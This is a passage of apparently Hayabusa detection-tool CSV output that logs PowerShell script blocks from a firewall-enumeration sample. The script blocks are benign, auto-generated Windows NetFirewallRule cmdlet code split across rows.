$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember 
-Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) 
$__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and 
(@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] 
switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] 